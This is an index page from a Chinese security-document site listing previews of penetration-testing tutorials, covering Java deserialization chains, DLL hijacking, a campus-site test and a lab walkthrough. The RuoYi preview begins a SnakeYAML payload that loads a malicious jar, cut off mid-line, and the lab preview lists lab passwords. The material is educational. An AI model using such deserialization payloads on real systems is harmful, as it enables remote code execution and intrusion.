爱豆文档 - 信息安全文档下载平台 - idocdown.com （部分文档，免费下载）

. . . . . .

Java反序列化之反射&URLDNS链审计

# Java反序列化之反射&URLDNS链审计教学文档 ## 一、Java序列化和反序列化基础 ### 1. 基本概念 - **序列化**：将Java对象转换为字节序列的过程 - **反序列化**：把字节序列恢复为Java对象的过程 ### 2. 主要用途 1. 实现数据持久化，将对象永久保存到硬盘 2. 实现远程通信，在网络上传送对象字节序列 3. 应用场景： - 将内存中的对象保存到文件或数据库 - 使用套接字在网络上传送对象 - 通过RMI传输对象 ### 3

2025-08-24 13:50:42

JAVA安全初探(三):CC1链全分析

该文档没有简介

2025-08-24 13:49:18

JAVA安全初探(三):CC1链全分析

# Java安全研究：CC1反序列化漏洞链全面分析 ## 一、环境准备 ### 1. JDK配置 - 使用JDK 8u65版本 - 配置到IDEA中：文件 → 项目结构 → SDK → 添加JDK路径 ### 2. Maven依赖 ```xml commons-collections commons-collections 3.2.1 ``` ### 3. JDK源码配置 1. 下载JDK源码：https://hg.

2025-08-24 13:49:18

曲折的命令执行回显

该文档没有简介

2025-08-24 13:48:19

曲折的命令执行回显

# 曲折的命令执行回显技术详解 ## 0x01 背景与发现在渗透测试过程中发现了一处若依(RuoYi)系统漏洞，该系统版本为4.2。进入后台后尝试常规攻击方法失败，但通过曲折的方式最终实现了命令执行和回显。 ## 0x02 初始攻击尝试 ### 2.1 内存马注入尝试使用Yaml反序列化加载恶意jar包： ```java org.yaml.snakeyaml.Yaml.load('!!javax.script.ScriptEngineManager [!!java.net.URLC

2025-08-24 13:48:19

dll劫持入门

该文档没有简介

2025-08-24 13:47:37

dll劫持入门

# DLL劫持技术详解 ## 一、DLL劫持基础概念 DLL劫持(DLL Hijacking)是一种利用Windows系统DLL加载机制的安全漏洞攻击技术。攻击者通过将恶意DLL放置在应用程序搜索路径中优先级较高的位置，使得应用程序在运行时加载恶意DLL而非合法的系统DLL。 ### Windows DLL加载机制 Windows操作系统通过以下两种机制确定应用程序调用的DLL路径： 1. **DLL路径搜索目录顺序**： - 程序所在目录 - 程序加载目录(SetCurr

2025-08-24 13:47:37

记一次校内站点的渗透测试

该文档没有简介

2025-08-24 13:46:30

记一次校内站点的渗透测试

# 校内站点渗透测试教学文档 ## 前言本文档基于一次对校内获奖申报平台的渗透测试实例，详细记录了测试过程中发现的多个高危漏洞，包括越权访问、任意文件上传、任意文件下载和任意用户添加等。这些漏洞的发现和利用过程将作为教学案例，帮助安全人员理解常见Web应用漏洞的检测和利用方法。 ## 0x01 越权漏洞 ### 漏洞发现 1. 首先在申报平台添加一次申报记录 2. 点击编辑功能并抓包（使用Burp Suite等工具） 3. 观察请求参数，发现使用`id`参数控制返回的数据 ### 漏洞

2025-08-24 13:46:30

渗透靶场——vulntarget-a综合靶场

该文档没有简介

2025-08-24 13:35:46

渗透靶场——vulntarget-a综合靶场

# Vulntarget-A 综合靶场渗透教学文档 ## 靶场环境概述 - **Win7系统**: - 密码: admin - 设置通达OA漏洞 - 入站规则开放80端口 - 存在永恒之蓝漏洞 - 网络配置: 动态外网IP(NAT模式), 静态内网IP - **Win2016系统**: - 账号: vulntarget\win2016 - 密码: Admin#123 - 管理员(administrator)密码: Admin@123 - 已安装Redis

2025-08-24 13:35:46

记一次测试过程中登录参数加密逆向分析

该文档没有简介

2025-08-24 13:34:38

跳转到页